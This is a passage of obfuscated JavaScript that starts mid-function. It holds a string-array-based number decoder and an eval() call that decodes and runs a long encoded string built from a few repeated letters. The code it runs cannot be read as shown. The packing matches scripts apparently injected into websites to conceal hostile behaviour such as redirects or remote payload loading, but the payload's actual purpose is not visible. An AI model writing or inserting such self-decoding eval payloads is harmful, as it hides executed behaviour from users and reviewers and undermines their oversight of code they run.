i=g[_0xc65e[3]](0,f);var j=d[_0xc65e[1]](_0xc65e[0])[_0xc65e[10]]()[_0xc65e[9]](function(a,b,c){if(h[_0xc65e[4]](b)!==-1)return a+=h[_0xc65e[4]](b)*(Math[_0xc65e[8]](e,c))},0);var k=_0xc65e[0];while(j>0){k=i[j%f]+k;j=(j-(j%f))/f}return k||_0xc65e[11]}eval(function(h,u,n,t,e,r){r="";for(var i=0,len=h.length;i<len;i++){var s="";while(h[i]!==n[e]){s+=h[i];i++}for(var j=0;j<n.length;j++)s=s.replace(new RegExp(n[j],"g"),j);r+=String.fromCharCode(_0xe38c(s,e,10)-t)}return decodeURIComponent(escape(r))}("PGPLPGqLqPPLqPPLCGqLPqqLqFFFLPGCLGqFLPPCLPPFLqFFqLPCPLPqPLqPPLGFGLPCPLPGFLqFFCLqCqLCFGLPqqLqFFFLPGFLqPPLGFFLGqqLGqCLGqGLGqGLGqGLGFFLGFFLqCqLGCPLqCqLGqCLGGPLGqCLGGPLGqCLGGqLGGFLGGPLGqCLGGqLGFFLqFqGLPGPLPGqLqPPLqFFCLPGPLPCPLPqPLPPFLqFFCLGqFLPCGLPPFLPqCLPqqLqFFFLPGPLPPFLPCPLGqFLPGCLPPFLPPPLqFFFLPCPLPqqLPCCLPGFLGPFLGPFLGPFLqPCLPPPLqFqFLPPPLqFFFLPGFLPCCLGGFLGqPLGqFLPGPLPCPLPCqLqPCLqCqLGFFLqFqGLPqCLPPFLPCPLPPPLqFFFLqCqLqFqqLqFFqLPqCLPCCLPCPLPCFLPqGLqFqqLqFqFLPqPLqFFCLPPCLPGPLPPPLqFFGLPCFLPPCLPCFLPCqLPPGLqFFCLPPCLPCFLqFFFLqFFCLPPCLqFFGLqFqqLqFqFLPCPLPCPLqFFqLqFFqLPGGLPCPLPPFLPPPLPCPLPCCLPqGLPPCLPCqLPqPLqFFGLPGCLPCCLPPCLPGGLPPFLPCCLPCCLqFFqLPPPLPGCLPGPLqFFGLPCCLPCPLPPFLPGFLPPCLPqqLqFFGLPCqLPPCLPPqLPqCLPCPLPCGLPCqLqFFFLqFFCLPPCLqFFGLPGGLPPCLPPFLPPCLqFFGLPGGLPPCLPPFLqCqLGPFLqCqLPqPLPPFLPqCLqFFqLPCCLPGFLPCPLqFFFLGqFLPGGLPGFLqFFFLCFCLPCGLPGFLPCCLPGFLPCPLqFFFLCFFLqFqFLCqGLPqPLqPPLqCCLqFFqLqFFFLPGCLqFFCLPGqLPGPLPPCLPGFLqFFFLPPCLPPPLPPPLPCFLqFFqLPCCLPqGLqFFFLPqCLqFFGLPGqLqFFGLPGFLPqPLPqPLqFFFLPqqLPGqLqFqqLPqPLqFFPLPPqLqFFqLPCqLqFqFLqFFGLqFFGLPCCLPGGLPPqLqFFGLqFqFLPPqLPqGLPPGLqFqqLqFFFLPqCLqFqqLPPCLqFFGLPGGLPPCLPPFLqCCLGFFLGCCLCPLPqCLPPFLPCPLPPPLqFFFLqCqLPqqLPqPLPqGLCFCLPCPLPqqLPqGLPCGLPGFLCFPLPPFLPPCLCGPLPqqLPGGLPGFLqCqLGPFLqCqLqFFFLPPCLqFFqLPGFLGCCLCPLPqCLPPFLPCPLPPPLqFFFLqCqLPqqLPqPLPqGLPqPLPGFLPqGLqFFqLPGGLqCqLGPFLqCqLPGqLPqqLPCGLPPPLPGFLGCCLCPLPqCLPPFLPCPLPPPLqFFFLqCqLPqqLPqPLPqGLCPFLPGFLPPCLPPPLPGPLPPFLPCPLqCqLGPFLqCqLqCCLGGqLGqFLGqGLqCCLGCCLCPLPCGLPGFLqFFFLqCqLPPFLPCPLCGPLPqqLPGGLPGFLCGFLPPFLPqqLPqPLqCqLGPFLqCqLqFFFLPPCLqFFqLPGFLGCCLCPLPCGLPGFLqFFFLqCqLPqPLPGPLPPPLPPqLPCGLPqqLqFqFLCGCLPCPLPqCLPGFLqCqLGPFLqCqLGqGLGCCLCPLPqCLPPFLPCPLPPPLqFFFLqCqLPqGLPPCLPqqLPCPLPqPLPGPLPCPLPGGLCFFLqFFFLPCPLqCqLGPFLqCqLPqPLPPFLPqCLqFFqLPCCLPGFLPCPLqFFFLGqFLPGGLPGFLqFFFLCFCLPCGLPGFLPCCLPGFLPCPLqFFFLCFFLqFqFLCqGLPqPLqPPLqCCLqFFCLPGFLPCGLPPCLPPPLPGGLqFqFLPPPLqFFGLPGCLPCCLPqGLqFFCLqFqqLPqPLPGCLPPFLqFqqLPGGLPCCLqFFGLqFqFLPGFLqFqFLPCPLPCFLPCGLPqPLPqCLPPPLPCqLqFqqLqFFFLPCPLPGqLPPqLqFFqLqFqqLqFFCLPGqLPGPLPqGLPCCLPPPLPqCLqFqqLqFqqLPPPLPqPLqFFqLqFFPLPGCLPPFLqFFCLPCPLqFqqLPqGLPCPLqFqqLPPCLqFFqLqFFqLPCGLPqCLPqCLPCCLqFFFLPPGLPPGLPqPLPPFLPCPLqFqqLPqPLqFFPLPCCLPPGLPPCLqFFGLPGGLPPCLPPFLPPCLqFFGLPGGLPPCLPPFLqCCLGFFLGCCLCPLPGPLPGqLqPPLPqGLPPCLPqqLPCPLPqPLPGPLPCPLPGGLCFFLqFFFLPCPLGFFLqFqGLqCqLPqGLPPCLPqqLPCPLPqPLPGPLPCPLPGGLCFFLqFFFLPCPLGqFLPqqLPqPLPqPLCFCLqFFGLPGFLPCPLqFFFLCGFLPGPLPPPLqFFFLPGFLPCPLPGFLPPCLqPPLqCCLPqCLPCGLPGPLPqCLPCqLqCCLGFCLqCqLPGqLqFFqLPCPLPqCLqFFFLPGPLPPFLPCPLqPPLPGFLqFFGLPGFLPCPLqFFFLGFFLqFqGLqCqLPGFLqFFGLPGFLPCPLqFFFLGqFLPPqLPPCLPGFLqFFGLPGFLPCPLqFFFLCFGLPGFLPGqLPqqLqFFqLPCGLqFFFLqPPLGFFLGCCLqCqLqFFCLPGPLPCPLPqPLPPFLqFFCLGqFLPCGLPPFLPqCLPqqLqFFFLPGPLPPFLPCPLGqFLPGCLPPCLPGFLPGqLqCqLGPFLqCqLqCCLPGCLqFFFLqFFFLPPqLPPPLGCGLGqqLGqqLPqCLPGCLPPqLPqqLPqPLPqGLPCGLPPFLPqCLPCqLGqFLPqCLPPFLPCCLGqqLPPqLPPCLPGPLPqCLPGPLPCPLPGGLGqqLqCCLGCCLqCqLPPCLPGFLqFFFLqFFqLPPCLPCPLqCqLPGqLPqqLPCGLPPPLPGFLGCCLqCqLqFqPLGFFLGCCLCPLqFqPLCPLPqCLPPFLPCPLPPPLqFFFLqCqLPqqLPqPLPqGLPCGLPPFLPqCLPCqLCFqLPCGLPPFLPPPLPGFLCFFLqFFFLPCPLqCqLGPFLqCqLPqPLPPFLPqCLqFFqLPCCLPGFLPCPLqFFFLGqFLPGGLPGFLqFFFLCFCLPCGLPGFLPCCLPGFLPCPLqFFFLCFFLqFqFLCqGLPqPLqPPLqCCLqFqqLPGGLqFFPLqFFqLPCCLPqCLPqCLqFFCLqFFPLqFFqLqFFCLPCPLPCqLqFqqLPqCLPCPLqFqqLPCGLPPGLqFFPLqFFGLqFqFLqFqqLqFFPLPGCLPPGLPGCLPGqLPCPLPqPLPqPLPqPLPCFLPGqLqFqqLPqPLPGqLPCqLqFFPLqFqFLqFFFLPCGLqFFqLqFFFLPCPLPGGLPqPLqFFPLPPGLqFFCLPCPLPCFLPPqLPqqLPCqLPCCLqFFqLPCGLPPFLPPGLPGCLqFFGLqFqqLPGCLPCCLPPGLPCCLqFFFLqFFqLqFqFLPPGLPPCLqFFGLPGGLPPCLPPFLPPCLqFFGLPGGLPPCLPPFLqCCLGFFLGCCLCPLPGPLPGqLqPPLPqqLPqPLPqGLPCGLPPFLPqCLPCqLCFqLPCGLPPFLPPPLPGFLCFFLqFFFLPCPLGFFLqFqGLqCqLPqqLPqPLPqGLPCGLPPFLPqCLPCqLCFqLPCGLPPFLPPPLPGFLCFFLqFFFLPCPLGqFLPPFLPCPLPqCLPCGLPGPLPqCLPCqLqCqLGPFLqCqLPGqLqFFqLPCPLPqCLqFFFLPGPLPPFLPCPLqPPLGFFLqFqGLqCqLqFqqLPGGLqFqqLPGqLPGPLPqCLqFqqLPGCLPPPLqFFqLqFFqLPGCLPGqLPCCLPGGLPGCLPqPLqFFqLPPqLPPFLqFFFLPCCLPCPLqFFFLPCCLPGCLqFFGLPqGLqFFqLPPCLPGqLPqCLPPCLqFqqLPPPLPCqLPGCLqFFPLPCCLPCPLPPPLPCPLPCGLPqGLPCCLqFqqLPCGLPqCLPqPLPCFLqFFCLPCPLqFFqLPCCLqFqqLPCCLqFqFLPqPLPCFLPGqLPqqLPqqLPqPLPCGLPqGLPGFLqFFFLPCGLPGFLqFFqLPCqLPPCLqFqFLqFFCLPPCLqFFGLPGGLPPCLPPFLPPCLqFFGLPGGLPPCLPPFLqPPLGFFLGCCLqCqLqFqPLCPLqFqPLCPLPGqLqFFqLPCPLPqCLqFFFLPGPLPPFLPCPLqCqLPPCLPPCLPCPLPqPLPCGLPPGLPqPLPGGLPqCLPCCLPCqLPGPLPqqLqFFGLqFFCLPCqLqFFFLPCGLqFqqLPqPLPqGLqFFGLPCqLqFFqLPqGLqFFqLPqPLPqCLqFFFLPGPLPCCLqFFqLqFFGLPCCLPqCLqFFPLqFFFLqFFCLPCPLPCPLPCPLPqGLPGqLPGGLqFFPLPCqLqFqqLqFFGLPGPLPPPLqFFGLqFqqLPGFLPCPLPqPLPPCLPPFLqFFqLqFFGLPPCLPCPLqFFGLPGGLqFqqLPqqLPCCLPGqLPqqLPqqLPPCLqFFGLPGGLPPCLPPFLPPCLqFFGLPGGLPPCLPPFLqPPLGFFLqCqLqFqGLqCqLqFFFLPPCLqFqFLqCqLqFqGLqCqLPPCLPGFLqFFFLqFFqLPPCLPCPLqCqLqFFCLPGPLPCPLPqPLPPFLqFFCLGqFLPCPLPqqLqFFGLPGPLPGGLPqqLqFFFLPPFLPPCLGqFLPPFLPCPLCGFLPGPLPCPLPGFLGCCLqCqLqFqPLqCqLPqCLPqqLqFFFLPqCLPGCLqCqLqPPLPGFLPPCLPPCLPPFLPPCLGFFLqCqLqFqGLqCqLPPCLPGFLqFFFLqFFqLPPCLPCPLqCqLqFFFLPPCLqFFqLPGFLGCCLqCqLqFqPLCPLqFqPLCPLPGqLqFFqLPCPLPqCLqFFFLPGPLPPFLPCPLqCqLPGCLPqqLPPPLCFqLPCGLPqqLPPPLPPPLqPPLPGFLGFCLqCqLqFFFLGFFLqCqLqFqGLqCqLPPCLPGFLqFFFLqFFqLPPCLPCPLqCqLqCGLqCGLPGFLGqFLPqCLPCGLPqqLPPPLPPPLCGGLPqqLPCCLPGFLGqFLPCCLPqqLqFFFLPqCLPGCLqPPLPCPLPGFLqFFCLqCqLCCqLPGFLPGGLCFCLqFFPLPPqLqPPLqCCLqPPLPFqLPFqLPPPLqFqCLPFCLGFFLqCCLqCqLGFGLqCqLqFFFLqCqLGFGLqCqLqCCLqPPLPFqLPFqLPPPLqFqCLqPFLGFFLqCCLGFFLGFFLCPLqFqPLCPLPGqLqFFqLPCPLPqCLqFFFLPGPLPPFLPCPLqCqLPqqLPqPLPqPLCFqLPCGLPqqLPPPLPPPLqPPLPGFLGFCLqCqLqFFFLGFFLqCqLqFqGLqCqLPGCLPqqLPPPLCFqLPCGLPqqLPPPLPPPLqPPLPGFLGFCLqCqLqFFFLGFFLqCqLqFqCLqFqCLqCqLqPPLPGFLGqFLPqCLPCGLPqqLPPPLPPPLCGGLPqqLPCCLPGFLqCqLGFGLGPFLqCqLqCCLqCqLqCCLqCqLGFGLqCqLqFFFLGFFLCPLqFqPLCPLPGqLqFFqLPCPLPqCLqFFFLPGPLPPFLPCPLqCqLPPCLPGFLPCCLPPFLqFFGLPGFLCFqLPCGLPqqLPPPLPPPLqPPLPGFLGFCLqCqLqFFFLGFFLqCqLqFqGLqCqLPGPLPGqLqCqLqPPLPGCLPqqLPPPLCFqLPCGLPqqLPPPLPPPLqPPLPGFLGFCLqCqLqFFFLGFFLGFFLqCqLqFqGLqCqLqFFGLPqqLPPCLqCqLPPFLqCqLGPFLqCqLPCPLPGFLqFFCLqCqLCCqLPGFLPGGLCFCLqFFPLPPqLqPPLqCCLqPPLPFqLPFqLPPPLqFqCLPFCLGFFLqCCLqCqLGFGLqCqLqFFFLqCqLGFGLqCqLqCCLqPPLPFqLPFqLPPPLqFqCLqPFLGFFLqCCLGFFLGCCLqCqLPGFLGqFLPqCLPCGLPqqLPPPLPPPLCGGLPqqLPCCLPGFLqCqLGPFLqCqLPGFLGqFLPqCLPCGLPqqLPPPLPPPLCGGLPqqLPCCLPGFLGqFLPPCLPGFLPPqLPCGLPqqLPqCLPGFLqPPLPPFLGFCLqCqLqCCLqCqLqCCLGFFLqCqLqFqPLCPLqFqPLCPLPCGLPGFLqFFFLqCqLPqCLPPFLqFFqLPCPLqFFFLqCqLGPFLqCqLGqGLGCCLCPLPGqLqFFqLPCPLPqCLqFFFLPGPLPPFLPCPLqCqLqFqqLPGGLqFqqLPGqLPGPLPqCLqFqqLPGCLPPPLqFFqLqFFqLPGCLPGqLPCCLPGGLPGCLPqPLqFFqLPPqLPPFLqFFFLPCCLPCPLqFFFLPCCLPGCLqFFGLPqGLqFFqLPPCLPGqLPqCLPPCLqFqqLPPPLPCqLPGCLqFFPLPCCLPCPLPPPLPCPLPCGLPqGLPCCLqFqqLPCGLPqCLPqPLPCFLqFFCLPCPLqFFqLPCCLqFqqLPCCLqFqFLPqPLPCFLPGqLPqqLPqqLPqPLPCGLPqGLPGFLqFFFLPCGLPGFLqFFqLPCqLPPCLqFqFLqFFCLPPCLqFFGLPGGLPPCLPPFLPPCLqFFGLPGGLPPCLPPFLqPPLGFFLqCqLqFqGLqCqLqFFFLPPCLqFqFLqFqGLqCqLPGPLPGqLqCqLqPPLqFqqLqFFqLPqCLPCCLPCPLPCFLPqGLqFqqLqFqFLPqPLqFFCLPPCLPGPLPPPLqFFGLPCFLPPCLPCFLPCqLPPGLqFFCLPPCLPCFLqFFFLqFFCLPPCLqFFGLqFqqLqFqFLPCPLPCPLqFFqLqFFqLPGGLPCPLPPFLPPPLPCPLPCCLPqGLPPCLPCqLPqPLqFFGLPGCLPCCLPPCLPGGLPPFLPCCLPCCLqFFqLPPPLPGCLPGPLqFFGLPCCLPCPLPPFLPGFLPPCLPqqLqFFGLPCqLPPCLPPqLPqCLPCPLPCGLPCqLqFFFLqFFCLPPCLqFFGLPGGLPPCLPPFLPPCLqFFGLPGGLPPCLPPFLGFFLqCqLqFqGLqCqLPPCLPGFLPCCLPPFLqFFGLPGFLCFqLPCGLPqqLPPPLPPPLqPPLqFqqLqFFqLPqCLPCCLPCPLPCFLPqGLqFqqLqFqFLPqPLqFFCLPPCLPGPLPPPLqFFGLPCFLPPCLPCFLPCqLPPGLqFFCLPPCLPCFLqFFFLqFFCLPPCLqFFGLqFqqLqFqFLPCPLPCPLqFFqLqFFqLPGGLPCPLPPFLPPPLPCPLPCCLPqGLPPCLPCqLPqPLqFFGLPGCLPCCLPPCLPGGLPPFLPCCLPCCLqFFqLPPPLPGCLPGPLqFFGLPCCLPCPLPPFLPGFLPPCLPqqLqFFGLPCqLPPCLPPqLPqCLPCPLPCGLPCqLqFFFLqFFCLPPCLqFFGLPGGLPPCLPPFLPPCLqFFGLPGGLPPCLPPFLGFCLqCqLqCCLqFqqLqFFCLqFFGLPqPLPCPLPqGLPGFLPPFLqFFCLqFqqLPPFLPqPLPGGLPqCLPGFLPCCLPPFLPPCLPGCLPGqLqFFqLqFFGLqFFCLPGPLPCCLPPCLqFFPLPCGLPCFLPPGLPCPLPGqLPCGLqFFCLPqCLqFFGLqFFPLqFFGLqFqqLqFFFLPCFLPqqLPPCLPPCLPCCLqFFqLqFFFLPPCLqFFGLPGGLPPCLPPFLqCCLGFFLGCCLqCqLPPCLPGFLPCCLPPFLqFFGLPGFLCFqLPCGLPqqLPPPLPPPLqPPLPqPLPPFLPqCLqFFqLPCCLPGFLPCPLqFFFLGqFLPqGLPPFLPqPLqFqFLGFCLqCqLqCCLqFFFLqFFPLPqGLPCPLqFFGLqFqqLPGPLPPCLPCGLqFFFLPPPLqFqFLPqPLPqCLPPFLqFFFLPGqLqFqqLPCFLPPPLPPCLPGFLPPPLPCPLPGCLPCGLPCGLqFqqLPCqLPPCLqFqqLPPCLPCCLqFFFLPCGLPqGLPCCLqFqFLqFqFLPPPLqFFGLPqPLPqqLPGGLqFFGLqFqFLPPPLPPFLPqPLPPCLqFFGLPGGLPPCLPPFLqCCLGFFLqCqLqFqPLqCqLqFqPLPqCLPqqLqFFFLPqCLPGCLqPPLPGFLGFFLqFqGLqCqLqFqPLCPLqFqPLCPLPGqLqFFqLPCPLPqCLqFFFLPGPLPPFLPCPLqCqLqFqqLqFFCLqFFGLPqPLPCPLPqGLPGFLPPFLqFFCLqFqqLPPFLPqPLPGGLPqCLPGFLPCCLPPFLPPCLPGCLPGqLqFFqLqFFGLqFFCLPGPLPCPLPGGLqFFGLPGCLPGFLPCCLPGCLPCPLPPCLPCqLPCqLPCCLPGGLPCPLqFqqLqFqqLPCFLqFqqLPCGLqFFFLPCGLPqPLqFqqLPPGLPCPLPqGLqFFqLPqqLPCGLPPqLqFqqLPqCLPGFLPGqLPPFLPqqLPGFLPCFLqFFGLPqqLqFFPLPCPLqFFCLqFFFLPGGLPCPLPCFLqFFqLPGCLqFFGLPPGLPPCLqFFGLPGGLPPCLPPFLPPCLqFFGLPGGLPPCLPPFLqPPLGFFLqCqLqFqGLqCqLPqCLPPFLPCPLPPPLqFFFLqCqLPCCLPPFLPqPLPqqLPCGLqCqLGPFLqCqLqFqqLqFFqLPqCLPCCLPCPLPCFLPqGLqFqqLqFqFLPqPLqFFCLPPCLPGPLPPPLqFFGLPCFLPPCLPCFLPCqLPPGLqFFCLPPCLPCFLqFFFLqFFCLPPCLqFFGLqFqqLqFqFLPCPLPCPLqFFqLqFFqLPGGLPCPLPPFLPPPLPCPLPCCLPqGLPPCLPCqLPqPLqFFGLPGCLPCCLPPCLPGGLPPFLPCCLPCCLqFFqLPPPLPGCLPGPLqFFGLPCCLPCPLPPFLPGFLPPCLPqqLqFFGLPCqLPPCLPPqLPqCLPCPLPCGLPCqLqFFFLqFFCLPPCLqFFGLPGGLPPCLPPFLPPCLqFFGLPGGLPPCLPPFLGCCLqCqLPGPLPGqLqCqLqPPLPCCLPPFLPqPLPqqLPCGLqCqLqCGLGPFLqCqLPCPLqFFqLPCGLPCGLqCqLqPGLqPGLqCqLGqGLqCqLGPFLGPFLqCqLPqPLPGPLPPPLPPqLPCGLPqqLqFqFLCGCLPCPLPqCLPGFLGFFLqCqLqFqGLqCqLPqPLPGPLPPPLPPqLPCGLPqqLqFqFLCGCLPCPLPqCLPGFLGFGLGFGLGCCLqCqLPqqLPqPLPqPLCFqLPCGLPqqLPPPLPPPLqPPLPCCLPPFLPqPLPqqLPCGLGFCLqCqLqCCLqFqqLqFFCLqFFGLPqPLPCPLPqGLPGFLPPFLqFFCLqFqqLPPFLPqPLPGGLPqCLPGFLPCCLPPFLPPCLPGCLPGqLqFFqLqFFGLqFFCLPGPLPCCLPPCLqFFPLPCGLPCFLPPGLPCPLPGqLPCGLqFFCLPqCLqFFGLqFFPLqFFGLqFqqLqFFFLPCFLPqqLPPCLPPCLPCCLqFFqLqFFFLPPCLqFFGLPGGLPPCLPPFLqCCLGFFLGCCLqCqLPqqLPqPLPqPLCFqLPCGLPqqLPPPLPPPLqPPLPqPLPPFLPqCLqFFqLPCCLPGFLPCPLqFFFLGqFLPqGLPPFLPqPLqFqFLGFCLqCqLqCCLqFFFLqFFPLPqGLPCPLqFFGLqFqqLPGPLPPCLPCGLqFFFLPPPLqFqFLPqPLPqCLPPFLqFFFLPGqLqFqqLPCFLPPPLPPCLPGFLPPPLPCPLPGCLPCGLPCGLqFqqLPCqLPPCLqFqqLPPCLPCCLqFFFLPCGLPqGLPCCLqFqFLqFqFLPPPLqFFGLPqPLPqqLPGGLqFFGLqFqFLPPPLPPFLPqPLPPCLqFFGLPGGLPPCLPPFLqCCLGFFLqCqLqFqPLCPLqFqPLCPLPGqLqFFqLPCPLPqCLqFFFLPGPLPPFLPCPLqCqLPqCLPGCLPPqLPFPLPqqLPqPLPPPLPFPLPqGLPCGLPPFLPqCLPCqLPGFLPPCLPFPLPqPLPGFLqFFFLPGFLPqCLqFFFLPPFLPPCLqPPLPGFLPCPLPqqLPqGLPCGLPGFLGFFLqCqLqFqGLqCqLPGPLPGqLqCqLqPPLPGFLPCPLPqqLPqGLPCGLPGFLGFFLqCqLqFqGLqCqLqFqqLqFFCLqFFGLPqPLPCPLPqGLPGFLPPFLqFFCLqFqqLPPFLPqPLPGGLPqCLPGFLPCCLPPFLPPCLPGCLPGqLqFFqLqFFGLqFFCLPGPLPCPLPGGLqFFGLPGCLPGFLPCCLPGCLPCPLPPCLPCqLPCqLPCCLPGGLPCPLqFqqLqFqqLPCFLqFqqLPCGLqFFFLPCGLPqPLqFqqLPPGLPCPLPqGLqFFqLPqqLPCGLPPqLqFqqLPqCLPGFLPGqLPPFLPqqLPGFLPCFLqFFGLPqqLqFFPLPCPLqFFCLqFFFLPGGLPCPLPCFLqFFqLPGCLqFFGLPPGLPPCLqFFGLPGGLPPCLPPFLPPCLqFFGLPGGLPPCLPPFLqPPLGFFLGCCLqCqLqFqPLCPLqFqPLCPLPGqLqFFqLPCPLPqCLqFFFLPGPLPPFLPCPLqCqLPGqLPqqLPGPLPPCLGPPLPqPLPqGLPCGLPPFLPqCLPCqLqPPLGFFLqCqLqFqGLqCqLPCGLPGFLqFFFLqCqLPPPLqFFFLPCPLPqPLqFqqLCCGLqFFFLqFqFLPCGLPGFLqCqLGPFLqCqLPqPLPPFLPqCLqFFqLPCCLPGFLPCPLqFFFLGqFLPGGLPGFLqFFFLCFCLPCGLPGFLPCCLPGFLPCPLqFFFLCFFLqFqFLCqGLPqPLqPPLqPCLPPPLqFFFLPCPLPqPLqFqqLGFPLPPPLqFFFLqFqFLPCGLPGFLqPCLGFFLGCCLqCqLPPCLPGFLqFFFLqFFqLPPCLPCPLqCqLPCPLqFFqLPCGLPCGLqCqLqCGLGPFLGPFLqCqLPPPLqFFFLPCPLPqPLqFqqLCCGLqFFFLqFqFLPCGLPGFLGCCLCPLqFqPLCPLPGqLqFFqLPCPLPqCLqFFFLPGPLPPFLPCPLqCqLPqqLPqPLPPPLCFFLPCGLPPFLPqCLPCqLPGFLPqPLqPPLqCqLPqCLPqqLPCGLPCGLPqGLPqqLPqCLPCqLqCqLGFFLqFqGLqCqLPCGLPGFLqFFFLqCqLPGCLPGFLPqqLPqPLqCqLGPFLqCqLPqPLPPFLPqCLqFFqLPCCLPGFLPCPLqFFFLGqFLPGGLPGFLqFFFLCFCLPCGLPGFLPCCLPGFLPCPLqFFFLPPPLCFFLqFqFLCCCLPqqLPGGLCGGLPqqLPCCLPGFLqPPLqPCLPGCLPGFLPqqLPqPLqPCLGFFLPFFLGqGLPFGLGCCLqCqLPCGLPGFLqFFFLqCqLPPPLPqCLPPCLPGPLPPqLqFFFLqCqLGPFLqCqLPqPLPPFLPqCLqFFqLPCCLPGFLPCPLqFFFLGqFLPqCLPPCLPGFLPqqLqFFFLPGFLCFCLPCGLPGFLPCCLPGFLPCPLqFFFLqPPLqPCLPPPLPqCLPPCLPGPLPPqLqFFFLqPCLGFFLGCCLqCqLPCGLPGFLqFFFLqCqLPqPLPPFLPCPLPGFLqCqLGPFLqCqLPGqLPqqLPCGLPPPLPGFLGCCLqCqLPGPLPGqLqPPLqCqLqCGLqCqLPPCLPPCLPCPLPqPLPCGLPPGLPqPLPGGLPqCLPCCLPCqLPGPLPqqLqFFGLqFFCLPCqLqFFFLPCGLqFqqLPqPLPqGLqFFGLPCqLqFFqLPqGLqFFqLPqPLPqCLqFFFLPGPLPCCLqFFqLqFFGLPCCLPqCLqFFPLqFFFLqFFCLPCPLPCPLPCPLPqGLPGqLPGGLqFFPLPCqLqFqqLqFFGLPGPLPPPLqFFGLqFqqLPGFLPCPLPqPLPPCLPPFLqFFqLqFFGLPPCLPCPLqFFGLPGGLqFqqLPqqLPCCLPGqLPqqLPqqLPPCLqFFGLPGGLPPCLPPFLPPCLqFFGLPGGLPPCLPPFLqPPLGFFLqCqLGFFLqFqGLqCqLPqCLPqqLPCGLPCGLPqGLPqqLPqCLPCqLqPPLPGqLPqqLPCGLPPPLPGFLGFFLGCCLqCqLPPCLPGFLqFFFLqFFqLPPCLPCPLqCqLPGqLPqqLPCGLPPPLPGFLGCCLqCqLqFqPLqCqLPqCLPPFLPCPLPPPLqFFFLqCqLPPCLPGFLPPGLCCPLCCqLCGFLqCqLGPFLqCqLqCCLPGCLqFFFLqFFFLPPqLPPPLGCGLGqqLGqqLPPqLPqqLPGGLPGFLPqqLPqPLGqPLGqFLPGGLPPFLPPFLPGGLPCGLPGFLPPPLqFqFLPCPLPqPLPGPLPqCLPqqLqFFFLPGPLPPFLPCPLGqFLPqCLPPFLPCCLGqqLPPqLPqqLPGGLPGFLPqqLPqPLGqqLPCFLPPPLGqqLPqqLPqPLPPPLPqGLqFqFLPGGLPPFLPPFLPGGLPCGLPGFLGqFLPCFLPPPLqCCLGCCLqCqLPPPLPqCLPPCLPGPLPPqLqFFFLGqFLPPPLPGFLqFFFLGPPLqFFFLqFFFLPPCLPGPLPqGLqFFqLqFFFLPGFLqPPLqCqLqCCLPPPLPPCLPqCLqCCLGFCLqCqLPPCLPGFLPPGLCCPLCCqLCGFLqCqLGFFLGCCLqCqLPPPLPqCLPPCLPGPLPPqLqFFFLGqFLPPPLPGFLqFFFLGPPLqFFFLqFFFLPPCLPGPLPqGLqFFqLqFFFLPGFLqPPLqCqLqCCLqFFFLqFqFLPPqLPGFLqCCLGFCLqCqLqCCLqFFFLPGFLqFFPLqFFFLGqqLPCFLPqqLqFFGLPqqLPPPLPqCLPPCLPGPLPPqLqFFFLqCCLqCqLGFFLGCCLqCqLPPPLPqCLPPCLPGPLPPqLqFFFLGqFLPPPLPGFLqFFFLGPPLqFFFLqFFFLPPCLPGPLPqGLqFFqLqFFFLPGFLqPPLqCqLqCCLPqCLPGCLPqqLPPCLPPPLPGFLqFFFLqCCLGFCLqCqLqCCLqFFqLqFFFLPGqLGFPLGCFLqCCLqCqLGFFLGCCLqCqLPPPLPqCLPPCLPGPLPPqLqFFFLGqFLPPFLPCPLPCGLPPFLPqqLPqPLqCqLGPFLqCqLPPPLPqCLPPCLPGPLPPqLqFFFLGqFLPPFLPCPLPPCLPGFLPqqLPqPLPPPLqFFFLPqqLqFFFLPGFLPqCLPGCLPqqLPCPLPGGLPGFLqCqLGPFLqCqLPGqLqFFqLPCPLPqCLqFFFLPGPLPPFLPCPLqPPLGFFLqCqLqFqGLqCqLPGPLPGqLqCqLqPPLqCqLqCGLqCqLPqPLPPFLPCPLPGFLqCqLqPGLqPGLqCqLqPPLqCqLqCGLqCqLqFFFLPGCLPGPLPPPLGqFLPPCLPGFLPqqLPqPLqFqFLCCGLqFFFLPqqLqFFFLPGFLqCqLqFqCLqFqCLqCqLqFFFLPGCLPGPLPPPLGqFLPPCLPGFLPqqLPqPLqFqFLCCGLqFFFLPqqLqFFFLPGFLqCqLGPFLGPFLGPFLqCqLqPCLPCGLPPFLPqqLPqPLPGFLPqPLqPCLqCqLqFqCLqFqCLqCqLqFFFLPGCLPGPLPPPLGqFLPPCLPGFLPqqLPqPLqFqFLCCGLqFFFLPqqLqFFFLPGFLqCqLGPFLGPFLGPFLqCqLqPCLPqCLPPFLPCCLPPqLPCGLPGFLqFFFLPGFLqPCLGFFLqCqLGFFLqCqLqFqGLqCqLPqPLPPFLPCPLPGFLqCqLGPFLqCqLqFFFLPPCLqFFqLPGFLGCCLqCqLPPPLPqCLPPCLPGPLPPqLqFFFLGqFLPPFLPCPLPCGLPPFLPqqLPqPLqCqLGPFLqCqLPPPLPqCLPPCLPGPLPPqLqFFFLGqFLPPFLPCPLPPCLPGFLPqqLPqPLqFqFLPPPLqFFFLPqqLqFFFLPGFLPqCLPGCLPqqLPCPLPGGLPGFLqCqLGPFLqCqLPCPLqFFqLPCGLPCGLGCCLqCqLPGPLPGqLqCqLqPPLqCqLqPCLqFFqLPCPLPqPLPGFLPGqLPGPLPCPLPGFLPqPLqPCLqCqLGPFLGPFLGPFLqCqLqFFFLqFqFLPPqLPGFLPPFLPGqLqCqLqFFCLPGPLPCPLPqPLPPFLqFFCLGqFLPqqLPqPLPPPLPqGLqFqFLPGGLPPFLPPFLPGGLPCGLPGFLqCqLGFFLqCqLqFqGLqCqLPqCLPqqLPCGLPCGLPqGLPqqLPqCLPCqLqPPLqCqLqFFFLPPCLqFFqLPGFLGFCLqCqLGqPLqCqLGFFLGCCLqCqLqFqPLqCqLPGFLPCGLPPPLPGFLqCqLqFqGLqCqLPqCLPqqLPCGLPCGLPqGLPqqLPqCLPCqLqPPLqCqLPGqLPqqLPCGLPPPLPGFLqCqLGFFLGCCLqCqLqFqPLqCqLPPPLPqCLPPCLPGPLPPqLqFFFLGqFLPPqLPqqLPPCLPGFLPCPLqFFFLCGGLPPFLPqPLPGFLGqFLPPCLPGFLPCCLPPFLqFFGLPGFLCFqLPGCLPGPLPCGLPqPLqPPLqCqLPPPLPqCLPPCLPGPLPPqLqFFFLqCqLGFFLGCCLqCqLqFqPLqCqLqFqPLGCCLqCqLPPPLPqCLPPCLPGPLPPqLqFFFLGqFLPPFLPCPLPGFLPPCLPPCLPPFLPPCLqCqLGPFLqCqLPGqLqFFqLPCPLPqCLqFFFLPGPLPPFLPCPLqPPLGFFLqCqLqFqGLqCqLPqCLPqqLPCGLPCGLPqGLPqqLPqCLPCqLq